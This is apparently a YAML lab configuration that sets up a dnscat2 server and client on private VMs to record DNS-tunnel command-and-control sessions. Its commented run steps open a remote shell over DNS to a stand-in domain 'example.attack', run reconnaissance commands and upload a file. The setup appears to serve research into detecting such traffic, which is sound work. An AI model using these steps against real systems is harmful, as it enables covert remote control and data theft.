dns_attack_server:
    name: dnscat_server
    image: ubuntu/focal64
    ipv4_address: 192.168.0.20
    description: |
      This sets up the DNSCat2 server.
    setup:
        type: shell
        val: >-
          apt install ruby ruby-dev;
          git clone https://github.com/iagox86/dnscat2.git;
          cd dnscat2/server/;
          gem install bundler;
          bundle install;
          apt-get install -y libtext-lorem-perl;
          lorem -p 10000 > /tmp/test-file;
    run:
        type: shell
        val: >-
          echo "This will be run interactively";
          #vagrant ssh dnscat_server;
          #asciinema rec /tmp/dnscat_server.cast;
          #ruby ./dnscat2/server/dnscat2.rb example.attack --secret 1234;
          #window -i 1;
          #shell;
          #ctrl-z;
          #window -i 2;
          #whoami;
          #pwd;
          #ps aux;
          #w;
          #env;
          #ctrl-z;
          #window -i 1;
          #upload /tmp/test-file /tmp/test-file;

    artifacts_to_collect:
      - type: files
        val: ["/tmp/*.cast"]

dns_attack_client:
    name: dnscat_client
    image: ubuntu/focal64
    ipv4_address: 192.168.0.30
    description: |
      This sets up the DNSCat2 client.
    setup:
      type: shell
      val: >-
        git clone https://github.com/iagox86/dnscat2.git;
        cd dnscat2/client/;
        make;
    run:
        type: shell
        val: >-
          echo "This will be run interactively";
          #vagrant ssh dnscat_client;
          #asciinema rec /tmp/dnscat_client.cast;
          #./dnscat2/client/dnscat --dns server=192.168.0.10,domain=example.attack --secret=1234;
          #exit;
    artifacts_to_collect:
      - type: files
        val: ["/tmp/*.cast"]